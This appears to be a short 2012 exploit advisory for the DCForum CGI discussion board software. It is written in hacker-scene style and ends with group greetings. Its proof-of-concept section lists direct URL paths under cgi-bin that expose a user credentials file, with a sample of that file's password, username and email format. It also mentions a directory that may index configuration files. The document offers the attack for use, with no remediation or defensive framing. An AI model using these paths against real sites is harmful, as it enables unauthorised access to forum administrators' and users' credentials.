# Exploit Title: DCForum Information Disclosure
# Date: 01/11/2012
# Author: r45c4l (@r45c4l)
# Email: infosecpirate@gmail.com
# Script url: http://webscripts.softpedia.com/script/Discussion-Boards/DCForum-20872.html
# Version: N/A
# CVE : ()
 
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 
Product Description :
 
DCForum is a complete web conferencing software for building and managing an online discussion community.
 

  
=================Exploit=================================================
                                    ---ICW---
 [ EXPL0!T ]
 
 
 p0c - www.site.com/cgi-bin/User_info/auth_user_file.txt
       www.site.com/cgi-bin/dcforum/User_info/auth_user_file.txt
 
 
 
 Example of auth_user_file.txt:
 
 password|admin|First_Name|Last_Name|mailid@site.com|on
 password|admin|admin|First_Name|Last_Name|mailid@site.com|on


In some cases http://www.site.com/cgi-local will index all the setup and configuration files


===========================================================================
Greetz to : Beenu Arora, d3hydr8, Hardeep Singh, micr0, sam, Sai Satish
            All members of ICW, AH and G4H, and all Indian Hackers
 
 
                     
Special Greetz to :  b4ltazar and s1nn3r and the entire darkc0de.com guys
             
 
                                    === End () ====